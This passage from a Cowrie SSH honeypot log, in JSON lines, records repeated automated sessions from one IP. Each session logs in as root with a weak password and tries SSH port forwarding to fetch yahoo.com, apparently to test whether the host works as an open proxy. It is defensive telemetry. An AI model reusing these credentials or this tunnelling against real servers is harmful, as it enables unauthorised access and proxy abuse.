message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.264155Z","src_ip":"213.209.150.239","session":"bf5fca2f6430"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.499382Z","src_ip":"213.209.150.239","session":"bf5fca2f6430"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4300,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4300","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.547813Z","session":"bf5fca2f6430"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.595308Z","src_ip":"213.209.150.239","session":"bf5fca2f6430"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":23265,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23265","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.733670Z","session":"bf5fca2f6430"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.780917Z","src_ip":"213.209.150.239","session":"bf5fca2f6430"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.828962Z","src_ip":"213.209.150.239","session":"bf5fca2f6430"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59011,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a58cdd901a6","protocol":"ssh","message":"New connection: 213.209.150.239:59011 (1.2.3.4:22) [session: 8a58cdd901a6]","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.884378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.894726Z","src_ip":"213.209.150.239","session":"8a58cdd901a6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.941038Z","src_ip":"213.209.150.239","session":"8a58cdd901a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.222534Z","src_ip":"213.209.150.239","session":"8a58cdd901a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":56,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:56","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.280699Z","session":"8a58cdd901a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.337226Z","src_ip":"213.209.150.239","session":"8a58cdd901a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":25596,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25596","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.490894Z","session":"8a58cdd901a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.547313Z","src_ip":"213.209.150.239","session":"8a58cdd901a6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.604471Z","src_ip":"213.209.150.239","session":"8a58cdd901a6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59077,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6eb75f790dd","protocol":"ssh","message":"New connection: 213.209.150.239:59077 (1.2.3.4:22) [session: c6eb75f790dd]","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.660294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.661011Z","src_ip":"213.209.150.239","session":"c6eb75f790dd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:07.717729Z","src_ip":"213.209.150.239","session":"c6eb75f790dd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.000022Z","src_ip":"213.209.150.239","session":"c6eb75f790dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28668,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28668","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.057626Z","session":"c6eb75f790dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.114365Z","src_ip":"213.209.150.239","session":"c6eb75f790dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":21305,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21305","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.270975Z","session":"c6eb75f790dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.327497Z","src_ip":"213.209.150.239","session":"c6eb75f790dd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.384954Z","src_ip":"213.209.150.239","session":"c6eb75f790dd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59124,"dst_ip":"1.2.3.4","dst_port":22,"session":"01a39c574ad5","protocol":"ssh","message":"New connection: 213.209.150.239:59124 (1.2.3.4:22) [session: 01a39c574ad5]","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.440691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.442098Z","src_ip":"213.209.150.239","session":"01a39c574ad5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.499007Z","src_ip":"213.209.150.239","session":"01a39c574ad5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.781698Z","src_ip":"213.209.150.239","session":"01a39c574ad5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":584,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:584","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.839327Z","session":"01a39c574ad5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:08.896164Z","src_ip":"213.209.150.239","session":"01a39c574ad5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28528,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28528","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.051248Z","session":"01a39c574ad5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.108281Z","src_ip":"213.209.150.239","session":"01a39c574ad5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.166372Z","src_ip":"213.209.150.239","session":"01a39c574ad5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59181,"dst_ip":"1.2.3.4","dst_port":22,"session":"42eada83b835","protocol":"ssh","message":"New connection: 213.209.150.239:59181 (1.2.3.4:22) [session: 42eada83b835]","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.212198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.222855Z","src_ip":"213.209.150.239","session":"42eada83b835"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.259581Z","src_ip":"213.209.150.239","session":"42eada83b835"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.494012Z","src_ip":"213.209.150.239","session":"42eada83b835"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24795,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24795","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.541929Z","session":"42eada83b835"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.589330Z","src_ip":"213.209.150.239","session":"42eada83b835"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":15720,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15720","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.733378Z","session":"42eada83b835"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.780393Z","src_ip":"213.209.150.239","session":"42eada83b835"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.828178Z","src_ip":"213.209.150.239","session":"42eada83b835"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59232,"dst_ip":"1.2.3.4","dst_port":22,"session":"c374b9a54005","protocol":"ssh","message":"New connection: 213.209.150.239:59232 (1.2.3.4:22) [session: c374b9a54005]","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.874200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.874954Z","src_ip":"213.209.150.239","session":"c374b9a54005"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:09.922454Z","src_ip":"213.209.150.239","session":"c374b9a54005"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.156876Z","src_ip":"213.209.150.239","session":"c374b9a54005"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11474,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11474","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.205359Z","session":"c374b9a54005"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.252443Z","src_ip":"213.209.150.239","session":"c374b9a54005"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":3658,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3658","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.389409Z","session":"c374b9a54005"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.436481Z","src_ip":"213.209.150.239","session":"c374b9a54005"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.484630Z","src_ip":"213.209.150.239","session":"c374b9a54005"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59277,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed320186dcd5","protocol":"ssh","message":"New connection: 213.209.150.239:59277 (1.2.3.4:22) [session: ed320186dcd5]","sensor":"my-vps","timestamp":"2025-08-26T00:57:10.530911Z"}
